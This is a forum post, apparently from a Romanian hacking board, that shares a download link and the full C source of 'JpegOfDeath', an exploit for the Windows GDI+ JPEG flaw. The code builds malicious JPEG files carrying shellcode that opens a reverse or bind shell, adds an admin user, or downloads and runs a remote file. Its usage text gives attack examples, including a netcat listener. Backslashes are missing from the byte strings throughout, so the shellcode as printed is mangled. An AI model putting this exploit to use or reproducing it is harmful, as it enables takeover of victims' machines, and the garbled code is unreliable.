Jump to content
bossjuan

jpegadmin

By bossjuan, in Cosul de gunoi

Recommended Posts

bossjuan Newbie

bossjuan

Posted
Posted

http://rapidshare.de/files/25029686/jpegadmin.rar.html

si exploit-ul

Exploit:

/*

* Exploit Name:

* =============

* JpegOfDeath.M.c v0.6.a All in one Bind/Reverse/Admin/FileDownload

* =============

* Tweaked Exploit By M4Z3R For GSO

* All Credits & Greetings Go To:

* ==========

* FoToZ, Nick DeBaggis, MicroSoft, Anthony Rocha, #romhack

* Peter Winter-Smith, IsolationX, YpCat, Aria Giovanni,

* Nick Fitzgerald, Adam Nance (where are you?),

* Santa Barbara, Jenna Jameson, John Kerry, so1o,

* Computer Security Industry, Rom Hackers, My chihuahuas

* (Rocky, Sailor, and Penny)...

* ===========

* Flags Usage:

* -a: Add User X with Pass X to Admin Group;

* IE: Exploit.exe -a pic.jpg

* -d: Download a File From an HTTP Server;

* IE: Exploit.exe -d [url]http://YourWebServer/Patch.exe[/url] pic.jpg

* -r: Send Back a Shell To a Specified IP on a Specific Port;

* IE: Exploit.exe -r 192.168.0.1 -p 123 pic.jpg (Default Port is 1337)

* -b: Bind a Shell on The Exploited Machine On a Specific Port;

* IE: Exploit.exe -b -p 132 pic.jpg (Default Port is 1337)

* Disclaimer:

* ===========

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR

* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES

* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.

* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,

* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT

* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,

* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY

* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT

* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF

* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE

*

*/

  

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <windows.h>

#pragma comment(lib, "ws2_32.lib")



// Exploit Data...



char reverse_shellcode[] =

"xD9xE1xD9x34"

"x24x58x58x58x58x80xE8xE7x31xC9x66x81xE9xACxFEx80"

"x30x92x40xE2xFAx7AxA2x92x92x92xD1xDFxD6x92x75xEB"

"x54xEBx7Ex6Bx38xF2x4Bx9Bx67x3Fx59x7Fx6ExA9x1CxDC"

"x9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6Cx21x84xC5xC1"

"xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6x1Bx77x1BxCF"

"x92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2x8Ex3Fx19xCA"

"x9Ax79x9Ex1FxC5xB6xC3xC0x6Dx42x1Bx51xCBx79x82xF8"

"x9AxCCx93x7CxF8x9AxCBx19xEFx92x12x6Bx96xE6x76xC3"

"xC1x6DxA6x1Dx7Ax1Ax92x92x92xCBx1Bx96x1Cx70x79xA3"

"x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92x6DxC7x8AxC5"

"xC5xC5xC5xD5xC5xD5xC5x6DxC7x86x1Bx51xA3x6DxFAxDF"

"xDFxDFxDFxFAx90x92xB0x83x1Bx73xF8x82xC3xC1x6DxC7"

"x82x17x52xE7xDBx1FxAExB6xA3x52xF8x87xCBx61x39x54"

"xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxCExB6xDAx1B"

"xCExB6xDEx1BxCExB6xC2x1FxD6xB6x82xC6xC2xC3xC3xC3"

"xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xBAx1Bx73x79x9C"

"xFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xB6xC5x6DxC7x9Ex6DxC7"

"xB2xC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97xEA"

"x93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6x19"

"x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9Fx93"

"x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4x19"

"x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3x52"

"x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52";



char bind_shellcode[] =

"xD9xE1xD9x34x24x58x58x58"

"x58x80xE8xE7x31xC9x66x81xE9x97xFEx80x30x92x40xE2"

"xFAx7AxAAx92x92x92xD1xDFxD6x92x75xEBx54xEBx77xDB"

"x14xDBx36x3FxBCx7Bx36x88xE2x55x4Bx9Bx67x3Fx59x7F"

"x6ExA9x1CxDCx9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6C"

"x21x84xC5xC1xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6"

"x1Bx77x1BxCFx92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2"

"x8Ex3Fx19xCAx9Ax79x9Ex1FxC5xBExC3xC0x6Dx42x1Bx51"

"xCBx79x82xF8x9AxCCx93x7CxF8x98xCBx19xEFx92x12x6B"

"x94xE6x76xC3xC1x6DxA6x1Dx7Ax07x92x92x92xCBx1Bx96"

"x1Cx70x79xA3x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92"

"x6DxC7xB2xC5xC5xC5xC5xD5xC5xD5xC5x6DxC7x8Ex1Bx51"

"xA3x6DxC5xC5xFAx90x92x83xCEx1Bx74xF8x82xC4xC1x6D"

"xC7x8AxC5xC1x6DxC7x86xC5xC4xC1x6DxC7x82x1Bx50xF4"

"x13x7ExC6x92x1FxAExB6xA3x52xF8x87xCBx61x39x1Bx45"

"x54xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxEExB6xDA"

"x1BxEExB6xDEx1BxEExB6xC2x1FxD6xB6x82xC6xC2xC3xC3"

"xC3xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xA2x1Bx73x79"

"x9CxFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xBExC5x6DxC7x9Ex6D"

"xC7xBAxC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97"

"xEAx93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6"

"x19x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9F"

"x93x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4"

"x19x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3"

"x52x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52";



char http_shellcode[]=

"xEBx0Fx58x80x30x17x40x81x38x6Dx30x30x21x75xF4"

"xEBx05xE8xECxFFxFFxFFxFEx94x16x17x17x4Ax42x26"

"xCCx73x9Cx14x57x84x9Cx54xE8x57x62xEEx9Cx44x14"

"x71x26xC5x71xAFx17x07x71x96x2Dx5Ax4Dx63x10x3E"

"xD5xFExE5xE8xE8xE8x9ExC4x9Cx6Dx2Bx16xC0x14x48"

"x6Fx9Cx5Cx0Fx9Cx64x37x9Cx6Cx33x16xC1x16xC0xEB"

"xBAx16xC7x81x90xEAx46x26xDEx97xD6x18xE4xB1x65"

"x1Dx81x4Ex90xEAx63x05x50x50xF5xF1xA9x18x17x17"

"x17x3ExD9x3ExE0xFExFFxE8xE8xE8x26xD7x71x9Cx10"

"xD6xF7x15x9Cx64x0Bx16xC1x16xD1xBAx16xC7x9ExD1"

"x9ExC0x4Ax9Ax92xB7x17x17x17x57x97x2Fx16x62xED"

"xD1x17x17x9Ax92x0Bx17x17x17x47x40xE8xC1x7Fx13"

"x17x17x17x7Fx17x07x17x17x7Fx68x81x8Fx17x7Fx17"

"x17x17x17xE8xC7x9Ex92x9Ax17x17x17x9Ax92x18x17"

"x17x17x47x40xE8xC1x40x9Ax9Ax42x17x17x17x46xE8"

"xC7x9ExD0x9Ax92x4Ax17x17x17x47x40xE8xC1x26xDE"

"x46x46x46x46x46xE8xC7x9ExD4x9Ax92x7Cx17x17x17"

"x47x40xE8xC1x26xDEx46x46x46x46x9Ax82xB6x17x17"

"x17x45x44xE8xC7x9ExD4x9Ax92x6Bx17x17x17x47x40"

"xE8xC1x9Ax9Ax86x17x17x17x46x7Fx68x81x8Fx17xE8"

"xA2x9Ax17x17x17x44xE8xC7x48x9Ax92x3Ex17x17x17"

"x47x40xE8xC1x7Fx17x17x17x17x9Ax8Ax82x17x17x17"

"x44xE8xC7x9ExD4x9Ax92x26x17x17x17x47x40xE8xC1"

"xE8xA2x86x17x17x17xE8xA2x9Ax17x17x17x44xE8xC7"

"x9Ax92x2Ex17x17x17x47x40xE8xC1x44xE8xC7x9Ax92"

"x56x17x17x17x47x40xE8xC1x7Fx12x17x17x17x9Ax9A"

"x82x17x17x17x46xE8xC7x9Ax92x5Ex17x17x17x47x40"

"xE8xC1x7Fx17x17x17x17xE8xC7xFFx6FxE9xE8xE8x50"

"x72x63x47x65x78x74x56x73x73x65x72x64x64x17x5B"

"x78x76x73x5Bx7Ex75x65x76x65x6Ex56x17x41x7Ex65"

"x63x62x76x7Bx56x7Bx7Bx78x74x17x48x7Bx74x65x72"

"x76x63x17x48x7Bx60x65x7Ex63x72x17x48x7Bx74x7B"

"x78x64x72x17x40x7Ex79x52x6Fx72x74x17x52x6Fx7E"

"x63x47x65x78x74x72x64x64x17x40x7Ex79x5Ex79x72"

"x63x17x5Ex79x63x72x65x79x72x63x58x67x72x79x56"

"x17x5Ex79x63x72x65x79x72x63x58x67x72x79x42x65"

"x7Bx56x17x5Ex79x63x72x65x79x72x63x45x72x76x73"

"x51x7Ex7Bx72x17x17x17x17x17x17x17x17x17x7Ax27"

"x27x39x72x6Fx72x17"

"m00!";



char admin_shellcode[] =

"x66x81xecx80x00x89xe6xe8xb7x00x00x00x89x06x89xc3"

"x53x68x7exd8xe2x73xe8xbdx00x00x00x89x46x0cx53x68"

"x8ex4ex0execxe8xafx00x00x00x89x46x08x31xdbx53x68"

"x70x69x33x32x68x6ex65x74x61x54xffxd0x89x46x04x89"

"xc3x53x68x5exdfx7cxcdxe8x8cx00x00x00x89x46x10x53"

"x68xd7x3dx0cxc3xe8x7ex00x00x00x89x46x14x31xc0x31"

"xdbx43x50x68x72x00x73x00x68x74x00x6fx00x68x72x00"

"x61x00x68x73x00x74x00x68x6ex00x69x00x68x6dx00x69"

"x00x68x41x00x64x00x89x66x1cx50x68x58x00x00x00x89"

"xe1x89x4ex18x68x00x00x5cx00x50x53x50x50x53x50x51"

"x51x89xe1x50x54x51x53x50xffx56x10x8bx4ex18x49x49"

"x51x89xe1x6ax01x51x6ax03xffx76x1cx6ax00xffx56x14"

"xffx56x0cx56x6ax30x59x64x8bx01x8bx40x0cx8bx70x1c"

"xadx8bx40x08x5exc2x04x00x53x55x56x57x8bx6cx24x18"

"x8bx45x3cx8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01"

"xebxe3x32x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38"

"xe0x74x07xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1"

"x8bx5ax24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04"

"x8bx01xe8xebx02x31xc0x89xeax5fx5ex5dx5bxc2x08x00";



char header1[] =

"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64"

"x00x64x00x00xFFxECx00x11x44x75x63x6Bx79x00x01x00"

"x04x00x00x00x0Ax00x00xFFxEEx00x0Ex41x64x6Fx62x65"

"x00x64xC0x00x00x00x01xFFxFEx00x01x00x14x10x10x19"

"x12x19x27x17x17x27x32xEBx0Fx26x32xDCxB1xE7x70x26"

"x2Ex3Ex35x35x35x35x35x3E";



char setNOPs1[] =

"xE8x00x00x00x00x5Bx8Dx8B"

"x00x05x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";



char setNOPs2[] =

"x3ExE8x00x00x00x00x5Bx8Dx8B"

"x2Fx00x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";



char header2[] =

"x44"

"x44x44x44x44x44x44x44x44x44x44x44x44x01x15x19x19"

"x20x1Cx20x26x18x18x26x36x26x20x26x36x44x36x2Bx2B"

"x36x44x44x44x42x35x42x44x44x44x44x44x44x44x44x44"

"x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44"

"x44x44x44x44x44x44x44x44x44x44x44x44x44xFFxC0x00"

"x11x08x03x59x02x2Bx03x01x22x00x02x11x01x03x11x01"

"xFFxC4x00xA2x00x00x02x03x01x01x00x00x00x00x00x00"

"x00x00x00x00x00x03x04x01x02x05x00x06x01x01x01x01"

"x01x00x00x00x00x00x00x00x00x00x00x00x00x01x00x02"

"x03x10x00x02x01x02x04x05x02x03x06x04x05x02x06x01"

"x05x01x01x02x03x00x11x21x31x12x04x41x51x22x13x05"

"x61x32x71x81x42x91xA1xC1x52x23x14xB1xD1x62x15xF0"

"xE1x72x33x06x82x24xF1x92x43x53x34x16xA2xD2x63x83"

"x44x54x25x11x00x02x01x03x02x04x03x08x03x00x02x03"

"x01x00x00x00x00x01x11x21x31x02x41x12xF0x51x61x71"

"x81x91xA1xB1xD1xE1xF1x22x32x42x52xC1x62x13x72x92"

"xD2x03x23x82xFFxDAx00x0Cx03x01x00x02x11x03x11x00"

"x3Fx00x0Fx90xFFx00xBCxDAxB3x36x12xC3xD4xADxC6xDC"

"x45x2FxB2x97xB8x9DxCBx63xFDx26xD4xC6xD7x70xA4x19"

"x24x50xCAx46x2BxFCxEBx3BxC7xC9xA5x4Ax8Fx69x26xDF"

"x6Dx72x4Ax9Ex27x6Bx3ExE6x92x86x24x85x04xDBxEDxA9"

"x64x8Ex6Bx63x67x19x1AxA5xE7xB8x28x3Dx09xABx5Dx5F"

"x16xF7x8CxEDx49x4CxF5x01xE6xE5xD5x1Cx49xABx10x71"

"xA6x36x9Bx93x24x61x00x0Fx61xECx34xA7x9Cx23xF4x96"

"xC6xE6xAFxB7x80x76xEFx93xF0xAAx28x8Ax6BxE0x18xC0"

"xA4x9Bx7Ex90x39x03xC2x90xDCx43x31x91x62x91x86x23"

"x35x35xA2x80x4DxFAx72x31x07x9Dx03x70xA8x93x24x4F"

"x89x51x83x5ExA4x2Ex7AxC0x7DxA9x8Ax10x61x64x07xFA"

"x88xC6x89x26xDAx0Fx20xBDxB9x16xD2xA8xE8x91x3Fx1A"

"xE2xBAxF0xBEx74xABx1DxC4x44x15x1Ax8Ax9CxC7x2Ax6B"

"xA3x33xB7x1Ex88x47x69xA9x64x68x26xC1x97x0BxD6x86"

"x8Bx1Bx29xC6x87xE4xC7xFDxCCx53x11xA5x9Cx62x6AxE5"

"x40x37x61x89xF6xB2x9Cx2Ax7CxFDx05x6Ax30x5Fx52x02"

"xEBx72xBFx7Dx74x4Cx23xB9x8FxD8x78x67x54x59x64x47"

"xC5x75x21x18xD5xE3x58xE1x72x63xBFx6DxBDxCBxCAx82"

"x65xE7xDBx09x54x4Fx0Dx95x86x76xE3xF2xA0x48x82x55"

"xD7xA6xCExA7xAAxDCx6AxF1xA9x8ExE0x35xC1xCAxA1xD4"

"x93xD2xD6x39x95x3Cx6Bx46x60xACxC1x3Bx60xC9x70x84"

"x8ExA1x9Ax9Ax20x01x94xCAx08x91x53xDCx01xB1xB5x12"

"x37x11xC6xC1xACxF1x11xD4x9Cx6Bx3Ex69x76xF0x1Dx7B"

"x52x6DxC9xA8x66x94xBBx79x8Fx7ExDEx17xFDx4DxABx1E"

"x76x7AxA3x2BxE2x50x06xB7x2CxEBx2Ax49xC9xEAx4Ex9B"

"xE7xCAxAFx1ExECx23xDCx8BxE1x6Bx5Fx1Ax9BxE8x49x2E"

"x63xE5x03x32xCDx19xB8x23x10x78x1Fx85x5Cx15x8Cx97"

"x84x9BxDBx15x35x9Fx16xE0x1Ex86xB9x8Fx97x11x4ExDA"

"x35x02x45x25x93xF8x55x24x17xB9x1BxF5xC8x07xA9xE2"

"x2Ax76xB0xC2x37x01x95xADx81xB6x1Cx6AxA2x38xD9xAE"

"xCAx59x18x75x25xFFx00x81xAExD8xE8xBBx47x62xACxB7"

"xB6xA1x8Dx40xE3x86x65x6Dx1ExDBx89x2Fx9DxCDx6Bx24"

"x62x41x61x89xACx2Dx8Bx3ExB6x68xC0x63x73x70x6Bx6B"

"x6AxA1x7AxACx56xE7x11x56x58xD4x13xA4x0BxB6xEBxB3"

"x3Bx47x22x95xD3x53x2ExEAx19x86x96xF7x03x83x52x9E"

"x54xABx6Ex58x63x7Cx33xCEx93xB1x19x1CxE9xDBxAAx35"

"xBFx46x8DxD4xD2x56xE0xE0x33xA1x4Dx0Ax4Ex3BxB1xCD"

"xD4x06x44x56x4AxCDx24x26xEAx6Dx7Ax87xDCx3Bx60x6D"

"xFCx2Ax86x1Bx97x36x6Dx42x04xA0x11xEExE7x46x22x35"

"xD5x26xB0x1Cx0Bx7Cx69x5Fx06xECx5AxC5x0Bx46x70x27"

"xF2xD4x79xADx89xDAx30x74xBDx98xE4x68x58x86xE4x1B"

"x69xB9xDCx2Bx30x87x48x53xC5x85x3BxDDx8Ax4ExB5x42"

"xB2x8Cx6Ex2Cx01xF8x56x04x7BxC9xA3x05x4FxB4xD5xA2"

"xDFxF6xFDxC6xE2xA7x3Cx89x24xFExA9x5ExC3xD4x6DxF7"

"x85xC9x59x39x63x59x9BxFFx00x06x1Ax5ExFAx69x0Ax46"

"x2BxC0x9FxC2x91x8BxC9x40x58x16xBDxF2xC0xD3x3Bx7F"

"x2DxA9xBBx2Ex49x42x6Dx52x70x39x62x9Fx08x73x6Fx20"

"x09x64x00x01x83x2Bx00xD5x97xBCxDCxF6x9CxA7x66xEA"

"xD9xB6x9FxE1x56xDExBAxECx65xB4x44xD8xE3x8Dx52x2F"

"x36xCEx74x33x7Ex9Fx2Ex22x99x8BxC9x6Dx5Ax6Dx9ExA8"

"x22xC7x0CxA8x62x3Dx17x1Dx2FxC8xFAxD4xB0x9Ex14x45"

"x45xD5x6Ex96x04xE1xF1xA0x37x90x5BxD8x7Fx81x57x1B"

"xC8xD5x48x27x0Ex3Cx6Bx3DxCDx44x15x92x41x25x94x82"

"xAEx0Ex42x97x8Dx8Cx6DxAEx56xB8x26xD8x0FxE3x43x93"

"x73x18x75x28xD7xF8xD5xFFx00x74xE4x18xC2x82xACx6F"

"x86x7Fx2Ax4CxBExE5xFCxD2x22xCCx9Ax32xD1x7Cx7Dx68";



char admin_header0[]=

"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64x00x60x00x00"

"xFFxECx00x11x44x75x63x6Bx79x00x01x00x04x00x00x00x0Ax00x00"

"xFFxEEx00x0Ex41x64x6Fx62x65x00x64xC0x00x00x00x01"
;



char admin_header1[]=

"xFFxFEx00x01"
;



char admin_header2[]=

"x00x14x10x10x19x12x19x27x17x17x27x32"
;



char admin_header3[]=

"xEBx0Fx26x32"
;



char admin_header4[]=

"xDCxB1xE7x70"
;



char admin_header5[]=

"x26x2Ex3Ex35x35x35x35x35x3E"

"xE8x00x00x00x00x5Bx8Dx8B"

"x00x05x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8"
;



char admin_header6[]=

"x00x00x00xFFxDBx00x43x00x08x06x06x07x06x05x08x07x07"

"x07x09x09x08x0Ax0Cx14x0Dx0Cx0Bx0Bx0Cx19x12x13x0Fx14"

"x1Dx1Ax1Fx1Ex1Dx1Ax1Cx1Cx20x24x2Ex27x20x22x2Cx23x1C"

"x1Cx28x37x29x2Cx30x31x34x34x34x1Fx27x39x3Dx38x32x3C"

"x2Ex33x34x32xFFxDBx00x43x01x09x09x09x0Cx0Bx0Cx18x0D"

"x0Dx18x32x21x1Cx21x32x32x32x32x32x32x32x32x32x32x32"

"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"

"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32"

"x32x32x32x32x32xFFxC0x00x11x08x00x03x00x03x03x01x22"

"x00x02x11x01x03x11x01xFFxC4x00x1Fx00x00x01x05x01x01"

"x01x01x01x01x00x00x00x00x00x00x00x00x01x02x03x04x05"

"x06x07x08x09x0Ax0BxFFxC4x00xB5x10x00x02x01x03x03x02"

"x04x03x05x05x04x04x00x00x01x7Dx01x02x03x00x04x11x05"

"x12x21x31x41x06x13x51x61x07x22x71x14x32x81x91xA1x08"

"x23x42xB1xC1x15x52xD1xF0x24x33x62x72x82x09x0Ax16x17"

"x18x19x1Ax25x26x27x28x29x2Ax34x35x36x37x38x39x3Ax43"

"x44x45x46x47x48x49x4Ax53x54x55x56x57x58x59x5Ax63x64"

"x65x66x67x68x69x6Ax73x74x75x76x77x78x79x7Ax83x84x85"

"x86x87x88x89x8Ax92x93x94x95x96x97x98x99x9AxA2xA3xA4"

"xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2xC3"

"xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE1"

"xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4xF5xF6xF7xF8"

"xF9xFAxFFxC4x00x1Fx01x00x03x01x01x01x01x01x01x01x01"

"x01x00x00x00x00x00x00x01x02x03x04x05x06x07x08x09x0A"

"x0BxFFxC4x00xB5x11x00x02x01x02x04x04x03x04x07x05x04"

"x04x00x01x02x77x00x01x02x03x11x04x05x21x31x06x12x41"

"x51x07x61x71x13x22x32x81x08x14x42x91xA1xB1xC1x09x23"

"x33x52xF0x15x62x72xD1x0Ax16x24x34xE1x25xF1x17x18x19"

"x1Ax26x27x28x29x2Ax35x36x37x38x39x3Ax43x44x45x46x47"

"x48x49x4Ax53x54x55x56x57x58x59x5Ax63x64x65x66x67x68"

"x69x6Ax73x74x75x76x77x78x79x7Ax82x83x84x85x86x87x88"

"x89x8Ax92x93x94x95x96x97x98x99x9AxA2xA3xA4xA5xA6xA7"

"xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2xC3xC4xC5xC6"

"xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE2xE3xE4xE5"

"xE6xE7xE8xE9xEAxF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxDAx00"

"x0Cx03x01x00x02x11x03x11x00x3Fx00xF9xFEx8Ax28xA0x0F"
;



// Code...

char newshellcode[2048];



unsigned char xor_data(unsigned char byte)

{

return(byte ^ 0x92);

}



void print_usage(char *prog_name)

{

printf(" Exploit Usage:n");

printf("t%s -r your_ip | -b [-p port] <jpeg_filename>nn", prog_name);

printf("ttt -a | -d <source_file> <jpeg_filename>nn");

printf(" Parameters:nn");

printf("t-r your_ip or -bt Choose -r for reverse connect attack modenttttand choose -b for a bind attack.

By defaultntttt if you don't specify -r or-b then a bindntttt attack will be generated.nn");

printf("t-a or -dtt The -a flag will create a user X with pass X, ntttt on the admin localgroup. The -d flag,

willntttt execute the source http path of the filentttt given.n");

printf("nt-p (optional)tt This option will allow you to change the port ntttt used for a bind or reverse

connect attack.ntttt If the attack mode is bindthen thentttt victim will open the -p port. If the

attackntttt modeis reverse connect then the port yountttt specify will be the one you wantto listen

ntttt on so the victim can connect to yountttt right away.nn");

printf(" Examples:n");

printf("t%s -r 68.6.47.62 -p 8888 test.jpgn", prog_name);

printf("t%s -b -p 1542 myjpg.jpgn", prog_name);

printf("t%s -a whatever.jpgn", prog_name);

printf("t%s -d [url]http://webserver.com/patch.exe[/url] exploit.jpgnn", prog_name);

printf(" Remember if you use the -r option to have netcat listeningn");

printf(" on the port you are using for the attack so the victim willn");

printf(" be able to connect to you when exploited...nn");

printf(" Example:n");

printf("tnc.exe -l -p 8888");

exit(-1);

}



int main(int argc, char *argv[])

{

FILE *fout;

unsigned int i = 0,j = 0;

int raw_num = 0;

unsigned long port = 1337; // default port for bind and reverse attacks

unsigned long encoded_port = 0;

unsigned long encoded_ip = 0;

unsigned char attack_mode = 2; // bind by default

char *p1 = NULL, *p2 = NULL;

char ip_addr[256];

char str_num[16];

char jpeg_filename[256];

WSADATA wsa;



printf(" +------------------------------------------------+n");

printf(" | JpegOfDeath - Remote GDI+ JPEG Remote Exploit |n");

printf(" | Exploit by John Bissell A.K.A. HighT1mes |n");

printf(" | TweaKed By M4Z3R For GSO |n");

printf(" | September, 23, 2004 |n");

printf(" +------------------------------------------------+n");



if (argc < 2)

print_usage(argv[0]);





 // process commandline

for (i = 0; i < (unsigned) argc; i++)

{



 if (argv[i][0] == '-')

 {



 switch (argv[i][1])

  {

  

  // reverse connect

  case 'r':

  strncpy(ip_addr, argv[i+1], 20);

   attack_mode = 1;

  break;

  

  // bind

  case 'b':

   attack_mode = 2;

  break;

  

  // Add.Admin

  case 'a':

   attack_mode = 3;

  break;



  // DL

  case 'd':

   attack_mode = 4;

  break;



  // port

  case 'p':

  port = atoi(argv[i+1]);

  break;

  }

 }

}



strncpy(jpeg_filename, argv[i-1], 255);

fout = fopen(argv[i-1], "wb");

       

if( !fout ) {

printf("Error: JPEG File %s Not Created!n", argv[i-1]);

return(EXIT_FAILURE);

}



  // initialize the socket library



if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {

printf("Error: Winsock didn't initialize!n");

exit(-1);

}



encoded_port = htonl(port);

encoded_port += 2;



if (attack_mode == 1)

{



  // reverse connect attack



 reverse_shellcode[184] = (char) 0x90;

 reverse_shellcode[185] = (char) 0x92;

 reverse_shellcode[186] = xor_data((char)((encoded_port >> 16) & 0xff));

 reverse_shellcode[187] = xor_data((char)((encoded_port >> 24) & 0xff));



 p1 = strchr(ip_addr, '.');

 strncpy(str_num, ip_addr, p1 - ip_addr);

 raw_num = atoi(str_num);

 reverse_shellcode[179] = xor_data((char)raw_num);



 p2 = strchr(p1+1, '.');

 strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1);

 raw_num = atoi(str_num);

 reverse_shellcode[180] = xor_data((char)raw_num);



 p1 = strchr(p2+1, '.');

 strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2);

 raw_num = atoi(str_num);

 reverse_shellcode[181] = xor_data((char)raw_num);



 p2 = strrchr(ip_addr, '.');

 strncpy(str_num, p2+1, 5);

 raw_num = atoi(str_num);

 reverse_shellcode[182] = xor_data((char)raw_num);

}



if (attack_mode == 2)

{

  // bind attack



 bind_shellcode[204] = (char) 0x90;

 bind_shellcode[205] = (char) 0x92;

 bind_shellcode[191] = xor_data((char)((encoded_port >> 16) & 0xff));

 bind_shellcode[192] = xor_data((char)((encoded_port >> 24) & 0xff));

}





if (attack_mode == 4)

{



  // Http DL

     

   strcpy(newshellcode,http_shellcode);

      strcat(newshellcode,argv[2]);

      strcat(newshellcode,"x01");

     

}

  

  // build the exploit jpeg



if ( attack_mode != 3)

{

 j = sizeof(header1) + sizeof(setNOPs1) + sizeof(header2) - 3;

     

 for(i = 0; i < sizeof(header1) - 1; i++)

 fputc(header1[i], fout);



 for(i=0;i<sizeof(setNOPs1)-1;i++)

 fputc(setNOPs1[i], fout);



 for(i=0;i<sizeof(header2)-1;i++)

 fputc(header2[i], fout);



 for( i = j; i < 0x63c; i++)

 fputc(0x90, fout);

 j = i;

}



if (attack_mode == 1)

{

 for(i = 0; i < sizeof(reverse_shellcode) - 1; i++)

 fputc(reverse_shellcode[i], fout);

}



else if (attack_mode == 2)

{

 for(i = 0; i < sizeof(bind_shellcode) - 1; i++)

 fputc(bind_shellcode[i], fout);

}



else if (attack_mode == 4)

{

 for(i = 0; i<sizeof(newshellcode) - 1; i++)

 {fputc(newshellcode[i], fout);}



 for(i = 0; i< sizeof(admin_shellcode) - 1; i++)

 {fputc(admin_shellcode[i], fout);}

}



else if (attack_mode == 3)

{



  for(i = 0; i < sizeof(admin_header0) - 1; i++){fputc(admin_header0[i], fout);}

  

  for(i = 0; i < sizeof(admin_header1) - 1; i++){fputc(admin_header1[i], fout);}



  for(i = 0; i < sizeof(admin_header2) - 1; i++){fputc(admin_header2[i], fout);}

  

  for(i = 0; i < sizeof(admin_header3) - 1; i++){fputc(admin_header3[i], fout);}



  for(i = 0; i < sizeof(admin_header4) - 1; i++){fputc(admin_header4[i], fout);}



  for(i = 0; i < sizeof(admin_header5) - 1; i++){fputc(admin_header5[i], fout);}

  

  for(i = 0; i < sizeof(admin_header6) - 1; i++){fputc(admin_header6[i], fout);}

  

  for (i = 0; i<1601; i++){fputc('x41', fout);}



  for(i = 0; i < sizeof(admin_shellcode) - 1; i++){fputc(admin_shellcode[i], fout);}





}



if (attack_mode != 3 )

{

 for(i = i + j; i < 0x1000 - sizeof(setNOPs2) + 1; i++)

 fputc(0x90, fout);



 for( j = 0; i < 0x1000 && j < sizeof(setNOPs2) - 1; i++, j++)

 fputc(setNOPs2[j], fout);

       

}



fprintf(fout, "xFFxD9");





fcloseall();



WSACleanup();



printf(" Exploit JPEG file %s has been generated!n", jpeg_filename);



return(EXIT_SUCCESS);

}  

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...